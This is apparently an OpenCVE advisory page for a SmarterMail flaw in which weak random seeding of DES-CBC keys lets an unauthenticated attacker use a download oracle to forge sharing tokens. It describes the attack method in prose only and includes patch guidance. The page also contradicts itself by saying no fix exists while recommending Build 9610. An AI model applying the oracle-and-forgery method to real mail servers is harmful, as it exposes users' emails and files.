Description
SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.
Published: 2026-04-27
Score: 8.2 High
EPSS: n/a
KEV: No
Impact: Unauthorized Access to Emails, Attachments, and Stored Files via Forged Tokens
Action: Patch Immediately
AI Analysis

Impact

SmarterTools SmarterMail versions before Build 9610 employ DES‑CBC encryption for file and email sharing. The encryption keys and IVs are derived from keys produced by System.Random seeded with minimal entropy, limiting the key space to roughly 19,000 possibilities. This weakness allows an attacker to reconstruct the encryption parameters. By probing the attachment download endpoint, an unauthenticated user can determine the seed and then forge sharing tokens that grant access to any email, attachment, or file stored by the system. The vulnerability is a cryptographic weakness due to weak random number generation (CWE‑338) and results in compromised confidentiality and integrity of user content.

Affected Systems

SmarterTools Inc. SmarterMail, all builds prior to 9610. The affected versions include any installation using DES‑CBC‑based sharing endpoints before the release of Build 9610.

Risk and Exploitability

The CVSS score of 8.2 indicates a high severity, and the lack of an EPSS score means we cannot estimate current exploitation probability. The vulnerability is not listed in the CISA KEV catalog. An unauthenticated attacker can exploit the weakness by sending crafted requests to the sharing download endpoint, using the oracle to recover the seed and subsequently generating valid tokens for arbitrary content. Because the vulnerability is tied to built‑in encryption logic, exploitation requires only network access to the vulnerable SmarterMail instance; no privileged credentials are needed.

Generated by OpenCVE AI on April 28, 2026 at 04:23 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update SmarterMail to Build 9610 or later, which removes the weak RNG and replaces DES‑CBC with a stronger cryptographic algorithm.
  • If an immediate upgrade is not possible, disable the file and email sharing endpoints or restrict them to authenticated users only.
  • Reconfigure the application to use a secure pseudorandom number generator and enforce stronger encryption primitives such as AES in GCM mode.

Generated by OpenCVE AI on April 28, 2026 at 04:23 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 28 Apr 2026 04:00:00 +0000

Type Values Removed Values Added
First Time appeared Smartertools
Smartertools smartermail
Vendors & Products Smartertools
Smartertools smartermail

Mon, 27 Apr 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 27 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Description SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.
Title SmarterTools SmarterMail < Build 9610 Cryptographic Weakness via Weak RNG
Weaknesses CWE-338
References
Metrics cvssV3_1

{'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}

cvssV4_0

{'score': 8.2, 'vector': 'CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Smartertools Smartermail
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-27T20:11:46.028Z

Reserved: 2026-04-13T20:29:02.809Z

Link: CVE-2026-40514

cve-icon Vulnrichment

Updated: 2026-04-27T19:06:38.770Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-04-27T15:16:20.160

Modified: 2026-04-27T18:57:20.293

Link: CVE-2026-40514

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-28T04:30:21Z

Weaknesses